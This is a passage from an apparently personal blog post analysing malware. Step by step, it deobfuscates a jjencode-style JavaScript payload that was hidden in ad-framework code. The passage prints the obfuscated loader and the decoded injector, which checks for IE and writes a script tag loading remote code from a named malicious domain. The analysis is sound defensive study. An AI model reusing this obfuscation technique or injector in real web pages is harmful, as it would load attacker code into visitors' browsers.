$a.$$__ + $a.$$__ + $a._$_ + $a._$_ + $a.$$$ + $a.$_$ + $a.$$_ + ".\\" + $a.__$ + $a.$_$ + $a._$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "?" + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "=" + $a.$_$_ + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "-\\" + $a.__$ + $a.$$_ + $a._$$ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.__$ + "." + $a.$$__ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + "'><" + "/\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\\"+\\\"\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + ">\\\");}" + "\"")())();
} catch (e) {}
Great! It's clear now that the code begins with an object declaration, and we can see why the whole code block is filled with dollar signs and underscores – all the attributes of the object named "$a" are named with various combinations of those two characters. Tricky!
$a = ~[];
$a = {
___: ++$a,
$$$$: (![] + "")[$a],
__$: ++$a,
$_$_: (![] + "")[$a],
_$_: ++$a,
$_$$: ({} + "")[$a],
$$_$: ($a[$a] + "")[$a],
_$$: ++$a,
$$$_: (!"" + "")[$a],
$__: ++$a,
$_$: ++$a,
$$__: ({} + "")[$a],
$$_: ++$a,
$$$: ++$a,
$___: ++$a,
$__$: ++$a
};
Let's see if we can't make sense of this. The very first line there uses a trick similar to another well-known obfuscation technique,
JSFuck. In javascript, "~[]" evaluates to -1, so that is our starting value for the variable "$a." The variable is then re-declared as an object, and if we calculate all the attribute values, it looks like this:
$a = -1;
$a = {
___: 0,
$$$$: "f",
__$: 1,
$_$_: "a",
_$_: 2,
$_$$: "b",
$$_$: "d",
_$$: 3,
$$$_: "e",
$__: 4,
$_$: 5,
$$__: "c",
$$_: 6,
$$$: 7,
$___: 8,
$__$: 9
};
Hmm...notice anything about that set of values? That's right, it maps cleanly to hexadecimal. That means this array can be used to print any hex character. We're getting somewhere now! Let's have a look at the next few lines to see what we can make of them:
$a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
$a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
$a.$ = ($a.___)[$a.$_][$a.$_];
Through some simple variable substitution and manual formatting for readability, we can translate these three lines into something much more clear:
$a.$_=
($a.$_=$a+"")[5]+ // "c"
($a._$=$a.$_[1])+ // "o"
($a.$$=($a.$+"")[1])+ // "n"
((!$a)+"")[3]+ // "s"
($a.__=$a.$_[6])+ // "t"
($a.$=(!""+"")[1])+ // "r"
($a._=(!""+"")[2])+ // "u"
$a.$_[5]+ // "c"
$a.__+ // "t"
$a._$+ // "o"
$a.$; // "r"
$a.$$=
$a.$+ // "r"
(!""+"")[3]+ // "e"
$a.__+ // "t"
$a._+ // "u"
$a.$+ // "r"
$a.$$; // "n"
$a.$=(0)["constructor"]["constructor"];
Excellent! Now we see that "$a.$_" just contains the string "constructor" and "$a.$$" contains another string, "return." The third variable, "$a.$" is a line of code that serves as an anonymous function declaration for whatever code is passed to it. Another way to write it would be like this:
$a.$ = function Function() { [native code] }
The code would be invoked like so:
$a.$("arbitrary javascript here");
Now there's just one big line of code left to deobfuscate. At this point it seems that we have enumerated all the relevant variables, so we'll perform some substitution to replace the relevant bits of code with the corresponding values. Order of operations is important once again, because e.g. if we choose to substitute variables named "$a.$$$" first, then variables named "$a.$$$$" will get partially overwritten and won't substitute correctly. Here's the order we'll follow to make sure we don't screw up the code:
$a.$_$_: "a"
$a.$_$$: "b"
$a.$$__: "c"
$a.$$_$: "d"
$a.$$$_: "e"
$a.$$$$: "f"
$a.$__$: 9
$a.$___: 8
$a.$$$: 7
$a.$$_: 6
$a.$_$: 5
$a.$__: 4
$a._$$: 3
$a._$_: 2
$a.__$: 1
$a.___: 0
$a.$_: "c"
$a._$: "o"
$a.$$: "n"
$a.__: "t"
$a._: "u"
$a.$: function Function() { [native code] }
A simple round of find & replace with each variable from top to bottom results in the following code:
try {
function Function1() {
function Function2() {
"n" + "\"" + "d" + "=" + "d" + "o" + "c" + "u" + "\\" + 1 + 5 + 5 + "e" + "\\" + 1 + 5 + 6 + "t" + ";" + "u" + "a" + "=\\" + 1 + 5 + 6 + "a" + "\\" + 1 + 6 + 6 + "\\" + 1 + 5 + 1 + "\\" + 1 + 4 + 7 + "a" + "t" + "o" + "\\" + 1 + 6 + 2 + "." + "u" + "\\" + 1 + 6 + 3 + "e" + "\\" + 1 + 6 + 2 + "\\" + 1 + 0 + 1 + "\\" + 1 + 4 + 7 + "e" + "\\" + 1 + 5 + 6 + "t" + ";\\" + 1 + 5 + 1 + "f" + "(" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "===" + "u" + "\\" + 1 + 5 + 6 + "d" + "e" + "f" + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "e" + "d" + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "d" + "." + "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('_" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=')==-" + 1 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 2 + 7 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "d" + "o" + "\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 3 + "\\" + 4 + 0 + "\\" + 1 + 1 + 6 + "\\" + 1 + 2 + 4 + "\\" + 4 + 0 + "')>" + 0 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 1 + 5 + "\\" + 1 + 2 + 3 + "\\" + 1 + 1 + 1 + "\\" + 1 + 0 + 5 + "\\" + 4 + 0 + "')>" + 0 + ")\\" + 4 + 0 + "{" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "=" + 1 + ";" + "d" + "." + "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + "='__" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=" + 1 + ";\\" + 4 + 0 + "e" + "\\" + 1 + 7 + 0 + "\\" + 1 + 6 + 0 + "\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 2 + "e" + "\\" + 1 + 6 + 3 + "=\\" + 1 + 2 + 7 + "e" + "d" + ",\\" + 4 + 0 + 0 + 1 + "\\" + 4 + 0 + "\\" + 1 + 1 + 2 + "a" + "\\" + 1 + 5 + 6 + "\\" + 4 + 0 + 2 + 0 + 2 + 0 + "\\" + 4 + 0 + 0 + 0 + ":" + 0 + 0 + ":" + 0 + 0 + "\\" + 4 + 0 + "\\" + 1 + 2 + 5 + "\\" + 1 + 2 + 4 + "\\" + 1 + 0 + 3 + ";\\" + 4 + 0 + "\\" + 1 + 6 + 0 + "a" + "t" + "\\" + 1 + 5 + 0 + "=/';" + "d" + ".\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "t" + "e" + (![] + "")[2] + "\\" + 1 + 5 + 6 + "(\\\"<" + "\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\\"+\\\"\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 0 + "t" + "\\" + 4 + 0 + "\\" + 1 + 6 + 3 + "\\" + 1 + 6 + 2 + "c" + "='\\" + 1 + 5 + 0 + "t" + "t" + "\\" + 1 + 6 + 0 + "://" + "b" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "\\" + 1 + 6 + 3 + "." + "b" + "\\" + 1 + 5 + 1 + "\\" + 1 + 7 + 2 + "/" + 0 + "c" + "c" + 2 + 2 + 7 + 5 + 6 + ".\\" + 1 + 5 + 2 + "\\" + 1 + 6 + 3 + "?" + "c" + "\\" + 1 + 6 + 0 + "=" + "a" + "d" + ".\\" + 1 + 6 + 3 + "a" + "\\" + 1 + 5 + 5 + "e" + "-\\" + 1 + 6 + 3 + "t" + "o" + "\\" + 1 + 6 + 2 + "\\" + 1 + 7 + 1 + "." + "c" + "o" + "\\" + 1 + 5 + 5 + "'><" + "/\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\\"+\\\"\\" + 1 + 6 + 0 + "t" + ">\\\");}" + "\""
}
}
} catch (e) {}
We're approaching readability now. Let's concatenate everything together and see how it looks. There's also one snippet of code in the middle we need to evaluate:
(![] + "")[2] -> evaluates to the letter "l"
Here's the resulting code block:
try {
function Function1() {
function Function2() {
"n\"d=docu\\155e\\156t;ua=\\156a\\166\\151\\147ato\\162.u\\163e\\162\\101\\147e\\156t;\\151f(d._\\172\\170===u\\156def\\151\\156ed\\40&&\\40d.coo\\153\\151e.\\163ea\\162c\\150('_ut\\155ud=')==-1\\40&&\\40ua.\\163ea\\162c\\150('\\127\\151\\156do\\167\\163\\40\\116\\124\\40')>0\\40&&\\40ua.\\163ea\\162c\\150('\\115\\123\\111\\105\\40')>0)\\40{d._\\172\\170=1;d.coo\\153\\151e='__ut\\155ud=1;\\40e\\170\\160\\151\\162e\\163=\\127ed,\\4001\\40\\112a\\156\\402020\\4000:00:00\\40\\125\\124\\103;\\40\\160at\\150=/';d.\\167\\162\\151tel\\156(\\\"<\\163c\\162\\\"+\\\"\\151\\160t\\40\\163\\162c='\\150tt\\160://b\\162\\151\\156\\163.b\\151\\172/0cc22756.\\152\\163?c\\160=ad.\\163a\\155e-\\163to\\162\\171.co\\155'></\\163c\\162\\151\\\"+\\\"\\160t>\\\");}\""
}
}
} catch (e) {}
So close now! Let's extract the code from inside the nested function blocks for another round of deobfuscation. We can see that some characters are escaped in there, so we'll do the same thing we did before and unescape backslashes, followed by quotes:
n"d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156(\"<\163c\162\"+\"\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\"+\"\160t>\");}"
The 'n' at the beginning of the string seems to indicate some kind of template literal, although in my research I wasn't able to determine exactly how it works. If anybody can fill in this gap in my understanding, please leave a comment. Regardless, if we drop the 'n,' unescape quotes yet again, and concatenate the strings together, we get the following result:
d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156("<\163c\162\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\160t>");}
Now we're starting to see parts of recognizable commands – at the beginning we see what is probably a "document" attribute being assigned to a variable named "d." But what are all those numbers preceded by backslashes? As it turns out, this is a rather obscure use of string literals – after
a bit of research, we learn that a backslash followed by up to three digits in a string is interpreted by javascript engines as a character with octal encoding. Let's decode these and see what we get:
d=document;ua=navigator.userAgent;if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");}
Bingo! We finally have our payload.
Step 4: Final Analysis
In order to determine what the payload does, let's prettify it:
d = document;
ua = navigator.userAgent;
if (d._zx === undefined && d.cookie.search('_utmud=') == -1 && ua.search('Windows NT ') > 0 && ua.search('MSIE ') > 0) {
d._zx = 1;
d.cookie = '__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");
}
Now it becomes quite easy to understand what this code is doing. First it checks some preconditions: it looks for a tracking cookie to make sure the script wasn't run before, and it checks the user agent to see if the browser is Internet Explorer. If those conditions are met, it sets a variable on the document, places a tracking cookie, and writes a line of javascript to the page. VirusTotal clearly shows this secondary script is malicious:
Sadly, the malicious domain was no longer resolvable at the time this article was written, so an analysis of the secondary payload was not possible (kill chain broken, hooray!). Without the capability to analyze that script, we just have to trust that the antivirus detections in VirusTotal are accurate. From that, we can conclude that a malicious javascript payload was intended to be injected into a page and executed by the victim's browser. The malicious code was embedded in another script that contained code for a (probably) legitimate ad framework.
Conclusion
In the end, the code given to me by a friend turned out to be adware with an unidentified malicious payload embedded. Whether the payload was delivered by the ad provider or injected by a third party cannot be determined without additional context, but the amount of work that went into obfuscating the payload clearly indicates that it was intended to remain hidden from casual inspection. All in all, I greatly enjoyed this exercise and learned a few new things along the way!